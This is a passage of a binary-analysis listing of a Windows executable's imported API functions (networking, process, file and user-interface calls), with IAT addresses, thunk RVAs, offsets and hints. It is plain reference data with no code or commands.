WNetGetConnectionW | 0x0 | 0x490400 | 0xbd648 | 0xbc248 | 0x24 |
WNetAddConnection2W | 0x0 | 0x490404 | 0xbd64c | 0xbc24c | 0x6 |
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
InternetQueryDataAvailable | 0x0 | 0x49077c | 0xbd9c4 | 0xbc5c4 | 0x9b |
InternetCloseHandle | 0x0 | 0x490780 | 0xbd9c8 | 0xbc5c8 | 0x6b |
InternetOpenW | 0x0 | 0x490784 | 0xbd9cc | 0xbc5cc | 0x9a |
InternetSetOptionW | 0x0 | 0x490788 | 0xbd9d0 | 0xbc5d0 | 0xaf |
InternetCrackUrlW | 0x0 | 0x49078c | 0xbd9d4 | 0xbc5d4 | 0x74 |
HttpQueryInfoW | 0x0 | 0x490790 | 0xbd9d8 | 0xbc5d8 | 0x5a |
InternetQueryOptionW | 0x0 | 0x490794 | 0xbd9dc | 0xbc5dc | 0x9e |
HttpOpenRequestW | 0x0 | 0x490798 | 0xbd9e0 | 0xbc5e0 | 0x58 |
HttpSendRequestW | 0x0 | 0x49079c | 0xbd9e4 | 0xbc5e4 | 0x5e |
FtpOpenFileW | 0x0 | 0x4907a0 | 0xbd9e8 | 0xbc5e8 | 0x35 |
FtpGetFileSize | 0x0 | 0x4907a4 | 0xbd9ec | 0xbc5ec | 0x32 |
InternetOpenUrlW | 0x0 | 0x4907a8 | 0xbd9f0 | 0xbc5f0 | 0x99 |
InternetReadFile | 0x0 | 0x4907ac | 0xbd9f4 | 0xbc5f4 | 0x9f |
InternetConnectW | 0x0 | 0x4907b0 | 0xbd9f8 | 0xbc5f8 | 0x72 |
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
GetProcessMemoryInfo | 0x0 | 0x490484 | 0xbd6cc | 0xbc2cc | 0x15 |
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
IcmpCreateFile | 0x0 | 0x490154 | 0xbd39c | 0xbbf9c | 0x85 |
IcmpCloseHandle | 0x0 | 0x490158 | 0xbd3a0 | 0xbbfa0 | 0x84 |
IcmpSendEcho | 0x0 | 0x49015c | 0xbd3a4 | 0xbbfa4 | 0x87 |
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
DestroyEnvironmentBlock | 0x0 | 0x490750 | 0xbd998 | 0xbc598 | 0x4 |
UnloadUserProfile | 0x0 | 0x490754 | 0xbd99c | 0xbc59c | 0x2c |
CreateEnvironmentBlock | 0x0 | 0x490758 | 0xbd9a0 | 0xbc5a0 | 0x0 |
LoadUserProfileW | 0x0 | 0x49075c | 0xbd9a4 | 0xbc5a4 | 0x21 |
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
IsThemeActive | 0x0 | 0x490764 | 0xbd9ac | 0xbc5ac | 0x3f |
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
DuplicateHandle | 0x0 | 0x490164 | 0xbd3ac | 0xbbfac | 0xe8 |
CreateThread | 0x0 | 0x490168 | 0xbd3b0 | 0xbbfb0 | 0xb5 |
WaitForSingleObject | 0x0 | 0x49016c | 0xbd3b4 | 0xbbfb4 | 0x4f9 |
HeapAlloc | 0x0 | 0x490170 | 0xbd3b8 | 0xbbfb8 | 0x2cb |
GetProcessHeap | 0x0 | 0x490174 | 0xbd3bc | 0xbbfbc | 0x24a |
HeapFree | 0x0 | 0x490178 | 0xbd3c0 | 0xbbfc0 | 0x2cf |
Sleep | 0x0 | 0x49017c | 0xbd3c4 | 0xbbfc4 | 0x4b2 |
GetCurrentThreadId | 0x0 | 0x490180 | 0xbd3c8 | 0xbbfc8 | 0x1c5 |
MultiByteToWideChar | 0x0 | 0x490184 | 0xbd3cc | 0xbbfcc | 0x367 |
MulDiv | 0x0 | 0x490188 | 0xbd3d0 | 0xbbfd0 | 0x366 |
GetVersionExW | 0x0 | 0x49018c | 0xbd3d4 | 0xbbfd4 | 0x2a4 |
IsWow64Process | 0x0 | 0x490190 | 0xbd3d8 | 0xbbfd8 | 0x30e |
GetSystemInfo | 0x0 | 0x490194 | 0xbd3dc | 0xbbfdc | 0x273 |
FreeLibrary | 0x0 | 0x490198 | 0xbd3e0 | 0xbbfe0 | 0x162 |
LoadLibraryA | 0x0 | 0x49019c | 0xbd3e4 | 0xbbfe4 | 0x33c |
GetProcAddress | 0x0 | 0x4901a0 | 0xbd3e8 | 0xbbfe8 | 0x245 |
WideCharToMultiByte | 0x0 | 0x4901a4 | 0xbd3ec | 0xbbfec | 0x511 |
lstrcpyW | 0x0 | 0x4901a8 | 0xbd3f0 | 0xbbff0 | 0x548 |
lstrlenW | 0x0 | 0x4901ac | 0xbd3f4 | 0xbbff4 | 0x54e |
GetModuleHandleW | 0x0 | 0x4901b0 | 0xbd3f8 | 0xbbff8 | 0x218 |
QueryPerformanceCounter | 0x0 | 0x4901b4 | 0xbd3fc | 0xbbffc | 0x3a7 |
VirtualFreeEx | 0x0 | 0x4901b8 | 0xbd400 | 0xbc000 | 0x4ed |
OpenProcess | 0x0 | 0x4901bc | 0xbd404 | 0xbc004 | 0x380 |
VirtualAllocEx | 0x0 | 0x4901c0 | 0xbd408 | 0xbc008 | 0x4ea |
WriteProcessMemory | 0x0 | 0x4901c4 | 0xbd40c | 0xbc00c | 0x52e |
ReadProcessMemory | 0x0 | 0x4901c8 | 0xbd410 | 0xbc010 | 0x3c3 |
CreateFileW | 0x0 | 0x4901cc | 0xbd414 | 0xbc014 | 0x8f |
SetFilePointerEx | 0x0 | 0x4901d0 | 0xbd418 | 0xbc018 | 0x467 |
SetEndOfFile | 0x0 | 0x4901d4 | 0xbd41c | 0xbc01c | 0x453 |
ReadFile | 0x0 | 0x4901d8 | 0xbd420 | 0xbc020 | 0x3c0 |
WriteFile | 0x0 | 0x4901dc | 0xbd424 | 0xbc024 | 0x525 |
FlushFileBuffers | 0x0 | 0x4901e0 | 0xbd428 | 0xbc028 | 0x157 |
TerminateProcess | 0x0 | 0x4901e4 | 0xbd42c | 0xbc02c | 0x4c0 |
CreateToolhelp32Snapshot | 0x0 | 0x4901e8 | 0xbd430 | 0xbc030 | 0xbe |
Process32FirstW | 0x0 | 0x4901ec | 0xbd434 | 0xbc034 | 0x396 |
Process32NextW | 0x0 | 0x4901f0 | 0xbd438 | 0xbc038 | 0x398 |
SetFileTime | 0x0 | 0x4901f4 | 0xbd43c | 0xbc03c | 0x46a |
GetFileAttributesW | 0x0 | 0x4901f8 | 0xbd440 | 0xbc040 | 0x1ea |
FindFirstFileW | 0x0 | 0x4901fc | 0xbd444 | 0xbc044 | 0x139 |
FindClose | 0x0 | 0x490200 | 0xbd448 | 0xbc048 | 0x12e |
GetModuleFileNameW | 0x0 | 0x490204 | 0xbd44c | 0xbc04c | 0x214 |
SetCurrentDirectoryW | 0x0 | 0x490208 | 0xbd450 | 0xbc050 | 0x44d |
GetShortPathNameW | 0x0 | 0x49020c | 0xbd454 | 0xbc054 | 0x261 |
DeleteFileW | 0x0 | 0x490210 | 0xbd458 | 0xbc058 | 0xd6 |
FindNextFileW | 0x0 | 0x490214 | 0xbd45c | 0xbc05c | 0x145 |
CopyFileExW | 0x0 | 0x490218 | 0xbd460 | 0xbc060 | 0x72 |
MoveFileW | 0x0 | 0x49021c | 0xbd464 | 0xbc064 | 0x363 |
CreateDirectoryW | 0x0 | 0x490220 | 0xbd468 | 0xbc068 | 0x81 |
RemoveDirectoryW | 0x0 | 0x490224 | 0xbd46c | 0xbc06c | 0x403 |
SetSystemPowerState | 0x0 | 0x490228 | 0xbd470 | 0xbc070 | 0x48a |
QueryPerformanceFrequency | 0x0 | 0x49022c | 0xbd474 | 0xbc074 | 0x3a8 |
FindResourceW | 0x0 | 0x490230 | 0xbd478 | 0xbc078 | 0x14e |
LoadResource | 0x0 | 0x490234 | 0xbd47c | 0xbc07c | 0x341 |
LockResource | 0x0 | 0x490238 | 0xbd480 | 0xbc080 | 0x354 |
SizeofResource | 0x0 | 0x49023c | 0xbd484 | 0xbc084 | 0x4b1 |
EnumResourceNamesW | 0x0 | 0x490240 | 0xbd488 | 0xbc088 | 0x102 |
OutputDebugStringW | 0x0 | 0x490244 | 0xbd48c | 0xbc08c | 0x38a |
GetTempPathW | 0x0 | 0x490248 | 0xbd490 | 0xbc090 | 0x285 |
GetTempFileNameW | 0x0 | 0x49024c | 0xbd494 | 0xbc094 | 0x283 |
DeviceIoControl | 0x0 | 0x490250 | 0xbd498 | 0xbc098 | 0xdd |
GetLocalTime | 0x0 | 0x490254 | 0xbd49c | 0xbc09c | 0x203 |
CompareStringW | 0x0 | 0x490258 | 0xbd4a0 | 0xbc0a0 | 0x64 |
GetCurrentProcess | 0x0 | 0x49025c | 0xbd4a4 | 0xbc0a4 | 0x1c0 |
LeaveCriticalSection | 0x0 | 0x490260 | 0xbd4a8 | 0xbc0a8 | 0x339 |
GetStdHandle | 0x0 | 0x490264 | 0xbd4ac | 0xbc0ac | 0x264 |
CreatePipe | 0x0 | 0x490268 | 0xbd4b0 | 0xbc0b0 | 0xa1 |
InterlockedExchange | 0x0 | 0x49026c | 0xbd4b4 | 0xbc0b4 | 0x2ec |
TerminateThread | 0x0 | 0x490270 | 0xbd4b8 | 0xbc0b8 | 0x4c1 |
LoadLibraryExW | 0x0 | 0x490274 | 0xbd4bc | 0xbc0bc | 0x33e |
FindResourceExW | 0x0 | 0x490278 | 0xbd4c0 | 0xbc0c0 | 0x14d |
CopyFileW | 0x0 | 0x49027c | 0xbd4c4 | 0xbc0c4 | 0x75 |
VirtualFree | 0x0 | 0x490280 | 0xbd4c8 | 0xbc0c8 | 0x4ec |
FormatMessageW | 0x0 | 0x490284 | 0xbd4cc | 0xbc0cc | 0x15e |
GetExitCodeProcess | 0x0 | 0x490288 | 0xbd4d0 | 0xbc0d0 | 0x1df |
SetErrorMode | 0x0 | 0x49028c | 0xbd4d4 | 0xbc0d4 | 0x458 |
GetPrivateProfileStringW | 0x0 | 0x490290 | 0xbd4d8 | 0xbc0d8 | 0x242 |
WritePrivateProfileStringW | 0x0 | 0x490294 | 0xbd4dc | 0xbc0dc | 0x52b |
GetPrivateProfileSectionW | 0x0 | 0x490298 | 0xbd4e0 | 0xbc0e0 | 0x240 |
WritePrivateProfileSectionW | 0x0 | 0x49029c | 0xbd4e4 | 0xbc0e4 | 0x529 |
GetPrivateProfileSectionNamesW | 0x0 | 0x4902a0 | 0xbd4e8 | 0xbc0e8 | 0x23f |
FileTimeToLocalFileTime | 0x0 | 0x4902a4 | 0xbd4ec | 0xbc0ec | 0x124 |
FileTimeToSystemTime | 0x0 | 0x4902a8 | 0xbd4f0 | 0xbc0f0 | 0x125 |
SystemTimeToFileTime | 0x0 | 0x4902ac | 0xbd4f4 | 0xbc0f4 | 0x4bd |
LocalFileTimeToFileTime | 0x0 | 0x4902b0 | 0xbd4f8 | 0xbc0f8 | 0x346 |
GetDriveTypeW | 0x0 | 0x4902b4 | 0xbd4fc | 0xbc0fc | 0x1d3 |
GetDiskFreeSpaceExW | 0x0 | 0x4902b8 | 0xbd500 | 0xbc100 | 0x1ce |
GetDiskFreeSpaceW | 0x0 | 0x4902bc | 0xbd504 | 0xbc104 | 0x1cf |
GetVolumeInformationW | 0x0 | 0x4902c0 | 0xbd508 | 0xbc108 | 0x2a7 |
SetVolumeLabelW | 0x0 | 0x4902c4 | 0xbd50c | 0xbc10c | 0x4a9 |
CreateHardLinkW | 0x0 | 0x4902c8 | 0xbd510 | 0xbc110 | 0x93 |
SetFileAttributesW | 0x0 | 0x4902cc | 0xbd514 | 0xbc114 | 0x461 |
CreateEventW | 0x0 | 0x4902d0 | 0xbd518 | 0xbc118 | 0x85 |
SetEvent | 0x0 | 0x4902d4 | 0xbd51c | 0xbc11c | 0x459 |
GetEnvironmentVariableW | 0x0 | 0x4902d8 | 0xbd520 | 0xbc120 | 0x1dc |
SetEnvironmentVariableW | 0x0 | 0x4902dc | 0xbd524 | 0xbc124 | 0x457 |
GlobalLock | 0x0 | 0x4902e0 | 0xbd528 | 0xbc128 | 0x2be |
GlobalUnlock | 0x0 | 0x4902e4 | 0xbd52c | 0xbc12c | 0x2c5 |
GlobalAlloc | 0x0 | 0x4902e8 | 0xbd530 | 0xbc130 | 0x2b3 |
GetFileSize | 0x0 | 0x4902ec | 0xbd534 | 0xbc134 | 0x1f0 |
GlobalFree | 0x0 | 0x4902f0 | 0xbd538 | 0xbc138 | 0x2ba |
GlobalMemoryStatusEx | 0x0 | 0x4902f4 | 0xbd53c | 0xbc13c | 0x2c0 |
Beep | 0x0 | 0x4902f8 | 0xbd540 | 0xbc140 | 0x36 |
GetSystemDirectoryW | 0x0 | 0x4902fc | 0xbd544 | 0xbc144 | 0x270 |
HeapReAlloc | 0x0 | 0x490300 | 0xbd548 | 0xbc148 | 0x2d2 |
HeapSize | 0x0 | 0x490304 | 0xbd54c | 0xbc14c | 0x2d4 |
GetComputerNameW | 0x0 | 0x490308 | 0xbd550 | 0xbc150 | 0x18f |
GetWindowsDirectoryW | 0x0 | 0x49030c | 0xbd554 | 0xbc154 | 0x2af |
GetCurrentProcessId | 0x0 | 0x490310 | 0xbd558 | 0xbc158 | 0x1c1 |
GetProcessIoCounters | 0x0 | 0x490314 | 0xbd55c | 0xbc15c | 0x24e |
CreateProcessW | 0x0 | 0x490318 | 0xbd560 | 0xbc160 | 0xa8 |
GetProcessId | 0x0 | 0x49031c | 0xbd564 | 0xbc164 | 0x24c |
SetPriorityClass | 0x0 | 0x490320 | 0xbd568 | 0xbc168 | 0x47d |
LoadLibraryW | 0x0 | 0x490324 | 0xbd56c | 0xbc16c | 0x33f |
VirtualAlloc | 0x0 | 0x490328 | 0xbd570 | 0xbc170 | 0x4e9 |
IsDebuggerPresent | 0x0 | 0x49032c | 0xbd574 | 0xbc174 | 0x300 |
GetCurrentDirectoryW | 0x0 | 0x490330 | 0xbd578 | 0xbc178 | 0x1bf |
lstrcmpiW | 0x0 | 0x490334 | 0xbd57c | 0xbc17c | 0x545 |
DecodePointer | 0x0 | 0x490338 | 0xbd580 | 0xbc180 | 0xca |
GetLastError | 0x0 | 0x49033c | 0xbd584 | 0xbc184 | 0x202 |
RaiseException | 0x0 | 0x490340 | 0xbd588 | 0xbc188 | 0x3b1 |
InitializeCriticalSectionAndSpinCount | 0x0 | 0x490344 | 0xbd58c | 0xbc18c | 0x2e3 |
DeleteCriticalSection | 0x0 | 0x490348 | 0xbd590 | 0xbc190 | 0xd1 |
InterlockedDecrement | 0x0 | 0x49034c | 0xbd594 | 0xbc194 | 0x2eb |
InterlockedIncrement | 0x0 | 0x490350 | 0xbd598 | 0xbc198 | 0x2ef |
GetCurrentThread | 0x0 | 0x490354 | 0xbd59c | 0xbc19c | 0x1c4 |
CloseHandle | 0x0 | 0x490358 | 0xbd5a0 | 0xbc1a0 | 0x52 |
EnterCriticalSection | 0x0 | 0x49035c | 0xbd5a4 | 0xbc1a4 | 0xee |
GetFullPathNameW | 0x0 | 0x490360 | 0xbd5a8 | 0xbc1a8 | 0x1fb |
EncodePointer | 0x0 | 0x490364 | 0xbd5ac | 0xbc1ac | 0xea |
ExitProcess | 0x0 | 0x490368 | 0xbd5b0 | 0xbc1b0 | 0x119 |
GetModuleHandleExW | 0x0 | 0x49036c | 0xbd5b4 | 0xbc1b4 | 0x217 |
ExitThread | 0x0 | 0x490370 | 0xbd5b8 | 0xbc1b8 | 0x11a |
GetSystemTimeAsFileTime | 0x0 | 0x490374 | 0xbd5bc | 0xbc1bc | 0x279 |
ResumeThread | 0x0 | 0x490378 | 0xbd5c0 | 0xbc1c0 | 0x413 |
GetCommandLineW | 0x0 | 0x49037c | 0xbd5c4 | 0xbc1c4 | 0x187 |
IsProcessorFeaturePresent | 0x0 | 0x490380 | 0xbd5c8 | 0xbc1c8 | 0x304 |
IsValidCodePage | 0x0 | 0x490384 | 0xbd5cc | 0xbc1cc | 0x30a |
GetACP | 0x0 | 0x490388 | 0xbd5d0 | 0xbc1d0 | 0x168 |
GetOEMCP | 0x0 | 0x49038c | 0xbd5d4 | 0xbc1d4 | 0x237 |
GetCPInfo | 0x0 | 0x490390 | 0xbd5d8 | 0xbc1d8 | 0x172 |
SetLastError | 0x0 | 0x490394 | 0xbd5dc | 0xbc1dc | 0x473 |
UnhandledExceptionFilter | 0x0 | 0x490398 | 0xbd5e0 | 0xbc1e0 | 0x4d3 |
SetUnhandledExceptionFilter | 0x0 | 0x49039c | 0xbd5e4 | 0xbc1e4 | 0x4a5 |
TlsAlloc | 0x0 | 0x4903a0 | 0xbd5e8 | 0xbc1e8 | 0x4c5 |
TlsGetValue | 0x0 | 0x4903a4 | 0xbd5ec | 0xbc1ec | 0x4c7 |
TlsSetValue | 0x0 | 0x4903a8 | 0xbd5f0 | 0xbc1f0 | 0x4c8 |
TlsFree | 0x0 | 0x4903ac | 0xbd5f4 | 0xbc1f4 | 0x4c6 |
GetStartupInfoW | 0x0 | 0x4903b0 | 0xbd5f8 | 0xbc1f8 | 0x263 |
GetStringTypeW | 0x0 | 0x4903b4 | 0xbd5fc | 0xbc1fc | 0x269 |
SetStdHandle | 0x0 | 0x4903b8 | 0xbd600 | 0xbc200 | 0x487 |
GetFileType | 0x0 | 0x4903bc | 0xbd604 | 0xbc204 | 0x1f3 |
GetConsoleCP | 0x0 | 0x4903c0 | 0xbd608 | 0xbc208 | 0x19a |
GetConsoleMode | 0x0 | 0x4903c4 | 0xbd60c | 0xbc20c | 0x1ac |
RtlUnwind | 0x0 | 0x4903c8 | 0xbd610 | 0xbc210 | 0x418 |
ReadConsoleW | 0x0 | 0x4903cc | 0xbd614 | 0xbc214 | 0x3be |
GetTimeZoneInformation | 0x0 | 0x4903d0 | 0xbd618 | 0xbc218 | 0x298 |
GetDateFormatW | 0x0 | 0x4903d4 | 0xbd61c | 0xbc21c | 0x1c8 |
GetTimeFormatW | 0x0 | 0x4903d8 | 0xbd620 | 0xbc220 | 0x297 |
LCMapStringW | 0x0 | 0x4903dc | 0xbd624 | 0xbc224 | 0x32d |
GetEnvironmentStringsW | 0x0 | 0x4903e0 | 0xbd628 | 0xbc228 | 0x1da |
FreeEnvironmentStringsW | 0x0 | 0x4903e4 | 0xbd62c | 0xbc22c | 0x161 |
WriteConsoleW | 0x0 | 0x4903e8 | 0xbd630 | 0xbc230 | 0x524 |
GetLongPathNameW | 0x0 | 0x4903ec | 0xbd634 | 0xbc234 | 0x20f |
SetEnvironmentVariableA | 0x0 | 0x4903f0 | 0xbd638 | 0xbc238 | 0x456 |
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
AdjustWindowRectEx | 0x0 | 0x4904cc | 0xbd714 | 0xbc314 | 0x3 |
CopyImage | 0x0 | 0x4904d0 | 0xbd718 | 0xbc318 | 0x54 |
SetWindowPos | 0x0 | 0x4904d4 | 0xbd71c | 0xbc31c | 0x2c6 |
GetCursorInfo | 0x0 | 0x4904d8 | 0xbd720 | 0xbc320 | 0x11f |
RegisterHotKey | 0x0 | 0x4904dc | 0xbd724 | 0xbc324 | 0x256 |
ClientToScreen | 0x0 | 0x4904e0 | 0xbd728 | 0xbc328 | 0x47 |
GetKeyboardLayoutNameW | 0x0 | 0x4904e4 | 0xbd72c | 0xbc32c | 0x141 |
IsCharAlphaW | 0x0 | 0x4904e8 | 0xbd730 | 0xbc330 | 0x1c4 |
IsCharAlphaNumericW | 0x0 | 0x4904ec | 0xbd734 | 0xbc334 | 0x1c3 |
IsCharLowerW | 0x0 | 0x4904f0 | 0xbd738 | 0xbc338 | 0x1c6 |
IsCharUpperW | 0x0 | 0x4904f4 | 0xbd73c | 0xbc33c | 0x1c8 |
GetMenuStringW | 0x0 | 0x4904f8 | 0xbd740 | 0xbc340 | 0x158 |
GetSubMenu | 0x0 | 0x4904fc | 0xbd744 | 0xbc344 | 0x17a |
GetCaretPos | 0x0 | 0x490500 | 0xbd748 | 0xbc348 | 0x10a |
IsZoomed | 0x0 | 0x490504 | 0xbd74c | 0xbc34c | 0x1e2 |
MonitorFromPoint | 0x0 | 0x490508 | 0xbd750 | 0xbc350 | 0x218 |
GetMonitorInfoW | 0x0 | 0x49050c | 0xbd754 | 0xbc354 | 0x15f |
SetWindowLongW | 0x0 | 0x490510 | 0xbd758 | 0xbc358 | 0x2c4 |
SetLayeredWindowAttributes | 0x0 | 0x490514 | 0xbd75c | 0xbc35c | 0x298 |
FlashWindow | 0x0 | 0x490518 | 0xbd760 | 0xbc360 | 0xfb |
GetClassLongW | 0x0 | 0x49051c | 0xbd764 | 0xbc364 | 0x110 |
TranslateAcceleratorW | 0x0 | 0x490520 | 0xbd768 | 0xbc368 | 0x2fa |
IsDialogMessageW | 0x0 | 0x490524 | 0xbd76c | 0xbc36c | 0x1cd |
GetSysColor | 0x0 | 0x490528 | 0xbd770 | 0xbc370 | 0x17b |
InflateRect | 0x0 | 0x49052c | 0xbd774 | 0xbc374 | 0x1b5 |
DrawFocusRect | 0x0 | 0x490530 | 0xbd778 | 0xbc378 | 0xc4 |
DrawTextW | 0x0 | 0x490534 | 0xbd77c | 0xbc37c | 0xd0 |
FrameRect | 0x0 | 0x490538 | 0xbd780 | 0xbc380 | 0xfd |
DrawFrameControl | 0x0 | 0x49053c | 0xbd784 | 0xbc384 | 0xc6 |
FillRect | 0x0 | 0x490540 | 0xbd788 | 0xbc388 | 0xf6 |
PtInRect | 0x0 | 0x490544 | 0xbd78c | 0xbc38c | 0x240 |
DestroyAcceleratorTable | 0x0 | 0x490548 | 0xbd790 | 0xbc390 | 0xa0 |
CreateAcceleratorTableW | 0x0 | 0x49054c | 0xbd794 | 0xbc394 | 0x58 |
SetCursor | 0x0 | 0x490550 | 0xbd798 | 0xbc398 | 0x288 |
GetWindowDC | 0x0 | 0x490554 | 0xbd79c | 0xbc39c | 0x192 |
GetSystemMetrics | 0x0 | 0x490558 | 0xbd7a0 | 0xbc3a0 | 0x17e |
GetActiveWindow | 0x0 | 0x49055c | 0xbd7a4 | 0xbc3a4 | 0x100 |
CharNextW | 0x0 | 0x490560 | 0xbd7a8 | 0xbc3a8 | 0x31 |
wsprintfW | 0x0 | 0x490564 | 0xbd7ac | 0xbc3ac | 0x333 |
RedrawWindow | 0x0 | 0x490568 | 0xbd7b0 | 0xbc3b0 | 0x24a |
DrawMenuBar | 0x0 | 0x49056c | 0xbd7b4 | 0xbc3b4 | 0xc9 |
DestroyMenu | 0x0 | 0x490570 | 0xbd7b8 | 0xbc3b8 | 0xa4 |
SetMenu | 0x0 | 0x490574 | 0xbd7bc | 0xbc3bc | 0x29c |
GetWindowTextLengthW | 0x0 | 0x490578 | 0xbd7c0 | 0xbc3c0 | 0x1a2 |
CreateMenu | 0x0 | 0x49057c | 0xbd7c4 | 0xbc3c4 | 0x6a |
IsDlgButtonChecked | 0x0 | 0x490580 | 0xbd7c8 | 0xbc3c8 | 0x1ce |
DefDlgProcW | 0x0 | 0x490584 | 0xbd7cc | 0xbc3cc | 0x95 |
CallWindowProcW | 0x0 | 0x490588 | 0xbd7d0 | 0xbc3d0 | 0x1e |
ReleaseCapture | 0x0 | 0x49058c | 0xbd7d4 | 0xbc3d4 | 0x264 |
SetCapture | 0x0 | 0x490590 | 0xbd7d8 | 0xbc3d8 | 0x280 |
CreateIconFromResourceEx | 0x0 | 0x490594 | 0xbd7dc | 0xbc3dc | 0x66 |
mouse_event | 0x0 | 0x490598 | 0xbd7e0 | 0xbc3e0 | 0x331 |
ExitWindowsEx | 0x0 | 0x49059c | 0xbd7e4 | 0xbc3e4 | 0xf5 |
SetActiveWindow | 0x0 | 0x4905a0 | 0xbd7e8 | 0xbc3e8 | 0x27f |
FindWindowExW | 0x0 | 0x4905a4 | 0xbd7ec | 0xbc3ec | 0xf9 |
EnumThreadWindows | 0x0 | 0x4905a8 | 0xbd7f0 | 0xbc3f0 | 0xef |
SetMenuDefaultItem | 0x0 | 0x4905ac | 0xbd7f4 | 0xbc3f4 | 0x29e |
InsertMenuItemW | 0x0 | 0x4905b0 | 0xbd7f8 | 0xbc3f8 | 0x1b9 |
IsMenu | 0x0 | 0x4905b4 | 0xbd7fc | 0xbc3fc | 0x1d2 |
TrackPopupMenuEx | 0x0 | 0x4905b8 | 0xbd800 | 0xbc400 | 0x2f7 |
GetCursorPos | 0x0 | 0x4905bc | 0xbd804 | 0xbc404 | 0x120 |
DeleteMenu | 0x0 | 0x4905c0 | 0xbd808 | 0xbc408 | 0x9e |
SetRect | 0x0 | 0x4905c4 | 0xbd80c | 0xbc40c | 0x2ae |
GetMenuItemID | 0x0 | 0x4905c8 | 0xbd810 | 0xbc410 | 0x152 |
GetMenuItemCount | 0x0 | 0x4905cc | 0xbd814 | 0xbc414 | 0x151 |
SetMenuItemInfoW | 0x0 | 0x4905d0 | 0xbd818 | 0xbc418 | 0x2a2 |
GetMenuItemInfoW | 0x0 | 0x4905d4 | 0xbd81c | 0xbc41c | 0x154 |
SetForegroundWindow | 0x0 | 0x4905d8 | 0xbd820 | 0xbc420 | 0x293 |
IsIconic | 0x0 | 0x4905dc | 0xbd824 | 0xbc424 | 0x1d1 |
FindWindowW | 0x0 | 0x4905e0 | 0xbd828 | 0xbc428 | 0xfa |
MonitorFromRect | 0x0 | 0x4905e4 | 0xbd82c | 0xbc42c | 0x219 |
keybd_event | 0x0 | 0x4905e8 | 0xbd830 | 0xbc430 | 0x330 |
SendInput | 0x0 | 0x4905ec | 0xbd834 | 0xbc434 | 0x276 |
GetAsyncKeyState | 0x0 | 0x4905f0 | 0xbd838 | 0xbc438 | 0x107 |
SetKeyboardState | 0x0 | 0x4905f4 | 0xbd83c | 0xbc43c | 0x296 |
GetKeyboardState | 0x0 | 0x4905f8 | 0xbd840 | 0xbc440 | 0x142 |
GetKeyState | 0x0 | 0x4905fc | 0xbd844 | 0xbc444 | 0x13d |
VkKeyScanW | 0x0 | 0x490600 | 0xbd848 | 0xbc448 | 0x321 |
LoadStringW | 0x0 | 0x490604 | 0xbd84c | 0xbc44c | 0x1fa |
DialogBoxParamW | 0x0 | 0x490608 | 0xbd850 | 0xbc450 | 0xac |
MessageBeep | 0x0 | 0x49060c | 0xbd854 | 0xbc454 | 0x20d |
EndDialog | 0x0 | 0x490610 | 0xbd858 | 0xbc458 | 0xda |
SendDlgItemMessageW | 0x0 | 0x490614 | 0xbd85c | 0xbc45c | 0x273 |
GetDlgItem | 0x0 | 0x490618 | 0xbd860 | 0xbc460 | 0x127 |
SetWindowTextW | 0x0 | 0x49061c | 0xbd864 | 0xbc464 | 0x2cb |
CopyRect | 0x0 | 0x490620 | 0xbd868 | 0xbc468 | 0x55 |
ReleaseDC | 0x0 | 0x490624 | 0xbd86c | 0xbc46c | 0x265 |
GetDC | 0x0 | 0x490628 | 0xbd870 | 0xbc470 | 0x121 |
EndPaint | 0x0 | 0x49062c | 0xbd874 | 0xbc474 | 0xdc |
BeginPaint | 0x0 | 0x490630 | 0xbd878 | 0xbc478 | 0xe |
GetClientRect | 0x0 | 0x490634 | 0xbd87c | 0xbc47c | 0x114 |
GetMenu | 0x0 | 0x490638 | 0xbd880 | 0xbc480 | 0x14b |
DestroyWindow | 0x0 | 0x49063c | 0xbd884 | 0xbc484 | 0xa6 |
EnumWindows | 0x0 | 0x490640 | 0xbd888 | 0xbc488 | 0xf2 |
GetDesktopWindow | 0x0 | 0x490644 | 0xbd88c | 0xbc48c | 0x123 |
IsWindow | 0x0 | 0x490648 | 0xbd890 | 0xbc490 | 0x1db |
IsWindowEnabled | 0x0 | 0x49064c | 0xbd894 | 0xbc494 | 0x1dc |
IsWindowVisible | 0x0 | 0x490650 | 0xbd898 | 0xbc498 | 0x1e0 |
EnableWindow | 0x0 | 0x490654 | 0xbd89c | 0xbc49c | 0xd8 |
InvalidateRect | 0x0 | 0x490658 | 0xbd8a0 | 0xbc4a0 | 0x1be |
GetWindowLongW | 0x0 | 0x49065c | 0xbd8a4 | 0xbc4a4 | 0x196 |
GetWindowThreadProcessId | 0x0 | 0x490660 | 0xbd8a8 | 0xbc4a8 | 0x1a4 |
AttachThreadInput | 0x0 | 0x490664 | 0xbd8ac | 0xbc4ac | 0xc |
GetFocus | 0x0 | 0x490668 | 0xbd8b0 | 0xbc4b0 | 0x12c |
GetWindowTextW | 0x0 | 0x49066c | 0xbd8b4 | 0xbc4b4 | 0x1a3 |
ScreenToClient | 0x0 | 0x490670 | 0xbd8b8 | 0xbc4b8 | 0x26d |
SendMessageTimeoutW | 0x0 | 0x490674 | 0xbd8bc | 0xbc4bc | 0x27b |
EnumChildWindows | 0x0 | 0x490678 | 0xbd8c0 | 0xbc4c0 | 0xdf |
CharUpperBuffW | 0x0 | 0x49067c | 0xbd8c4 | 0xbc4c4 | 0x3b |
GetParent | 0x0 | 0x490680 | 0xbd8c8 | 0xbc4c8 | 0x164 |
GetDlgCtrlID | 0x0 | 0x490684 | 0xbd8cc | 0xbc4cc | 0x126 |
SendMessageW | 0x0 | 0x490688 | 0xbd8d0 | 0xbc4d0 | 0x27c |
MapVirtualKeyW | 0x0 | 0x49068c | 0xbd8d4 | 0xbc4d4 | 0x208 |
PostMessageW | 0x0 | 0x490690 | 0xbd8d8 | 0xbc4d8 | 0x236 |
GetWindowRect | 0x0 | 0x490694 | 0xbd8dc | 0xbc4dc | 0x19c |
SetUserObjectSecurity | 0x0 | 0x490698 | 0xbd8e0 | 0xbc4e0 | 0x2be |
CloseDesktop | 0x0 | 0x49069c | 0xbd8e4 | 0xbc4e4 | 0x4a |
